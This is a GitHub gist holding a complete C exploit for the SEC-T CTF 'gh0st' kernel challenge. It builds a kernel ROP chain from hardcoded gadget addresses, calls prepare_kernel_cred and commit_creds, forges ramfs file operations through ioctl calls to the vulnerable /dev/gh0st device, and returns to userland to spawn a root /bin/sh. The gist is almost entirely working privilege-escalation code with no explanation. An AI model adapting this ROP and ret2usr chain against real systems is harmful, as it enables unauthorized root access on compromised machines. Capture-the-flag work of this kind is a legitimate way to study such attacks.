Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exploit.c

Created Nov 18, 2018
Embed
What would you like to do?
SEC-T CTF gh0st
// gcc -static -nostdlib -masm=intel ./exp.c -o exp
// syscall
int read(int fd, char* buf, int len) {
__asm__("mov rax, 0");
__asm__("syscall");
}
int write(int fd, char* buf, int len) {
__asm__("mov rax, 1");
__asm__("syscall");
}
int open(char* filename, int flags) {
__asm__("mov rax, 2");
__asm__("syscall");
}
int close(int fd) {
__asm__("mov rax, 2");
__asm__("syscall");
}
void exit(int status) {
__asm__("mov rax, 60");
__asm__("syscall");
}
int ioctl(unsigned int fd, unsigned int cmd, char* arg) {
__asm__("mov rax, 16");
__asm__("syscall");
}
int execve(char *filename, char *const argv[], char *const envp[]) {
__asm__("mov rax, 59");
__asm__("syscall");
}
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
__asm__("mov r10, rcx");
__asm__("mov rax, 9");
__asm__("syscall");
}
// helper
int strlen(char* string) {
int len = 0;
for (; *(string++) != '\x00'; len++) {}
return len;
}
void puts(char* string) {
int len = strlen(string);
write(1, string, len);
}
void memset(char* a, char b, int len) {
int i;
for (i=0; i<len; i++) {
a[i] = b;
}
}
// for exploit
#define O_RDONLY 0
#define O_RDWR 00000002
#define PROT_READ 0x1
#define PROT_WRITE 0x2
#define MAP_POPULATE 0x8000
// gadgets
unsigned long pop_rdi = 0xffffffff81000a78; // 0xffffffff81000a78: pop rdi ; ret ; (1290 found)
unsigned long mov_rdi_rax_call_rcx = 0xffffffff8103671d; // 0xffffffff8103671d: mov rdi, rax ; call rcx ; (2 found)
unsigned long pop_rcx = 0xffffffff8101d6dc; // 0xffffffff8101d6dc: pop rcx ; ret ; (19 found)
unsigned long xor_rax = 0xffffffff81076cc0; // 0xffffffff81076cc0: xor rax, rax ; ret ; (5 found)
unsigned long iretq = 0xffffffff812009d0; // fffffff812009d0: 48 cf iretq
unsigned long swapgs_popfq_ret = 0xffffffff81200bea;
unsigned long pivot_gadget = 0xffffffff810f3d0e; // 0xffffffff810f3d0e: mov esp, 0x8948FFF8 ; ret ; (1 found)
unsigned long commit_creds = 0xffffffff81038563;
unsigned long prepare_kernel_cred= 0xffffffff81038715;
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
static void save_state() {
__asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs));
__asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss));
__asm__("pushfq");
__asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags));
}
void shell(void) {
char *args[] = {"/bin/sh", 0};
execve("/bin/sh", args, 0);
}
void _start(void) {
int i = 0;
char buf[0x1000];
int fd;
int fds[0x100];
unsigned long* fake_stack;
save_state();
fake_stack = mmap(0x8948f000, 0x10000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0);
fake_stack += (0xff8/8);
*fake_stack++ = pop_rdi;
*fake_stack++ = 0;
*fake_stack++ = prepare_kernel_cred;
*fake_stack++ = pop_rcx;
*fake_stack++ = commit_creds;
*fake_stack++ = mov_rdi_rax_call_rcx;
*fake_stack++ = swapgs_popfq_ret;
*fake_stack++ = 0x246;
*fake_stack++ = iretq;
*fake_stack++ = &shell;
*fake_stack++ = user_cs;
*fake_stack++ = user_rflags;
*fake_stack++ = 0x8948f000 + 0x8000;
*fake_stack++ = user_ss;
fd = open("/dev/gh0st", O_RDWR);
if (fd < 0) {
puts("open error\n");
exit(1);
}
for (int i=0; i<0x100; i++) {
fds[i] = open("/home/ctf/banner", O_RDONLY);
if (fds[i] < 0) {
puts("open error fds\n");
exit(1);
}
}
// create
buf[0] = 'B'; buf[1] = 'F'; buf[2] = 'B'; buf[3] = 'F'; // header
buf[4] = 0x80; buf[5] = 0x0; buf[6] = 0; buf[7] = 0; // size
memset(buf + 8, '+', 0x1000 - 8);
ioctl(fd, 0x1337B4B3, buf);
*(unsigned long*)(buf+0x8) = (unsigned long)0xffffffffa0002380 + 0x108;
// fake ramfs_file_operations
for (int i=0; i<0x100/8; i++) {
*(unsigned long*)(buf+0x108 + i*8) = 0;
}
*(unsigned long*)(buf+0x108 + 2 * 8) = pivot_gadget;
memset(buf + 0x208, '-', 0x1000-0x208); // decrease stack ptr
for (int i=0; i<8; i++) {
buf[0x208+0xb0 + i*2 ] = ','; // write stack
buf[0x209+0xb0 + i*2] = '+'; // increase stack ptr
}
write(fd, buf, 0x1000);
ioctl(fd, 0xAC1DC0DE, buf);
for (int i=0; i<0x100; i++) {
read(fds[i], buf, 0x1000);
}
while (1) {}
exit(0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.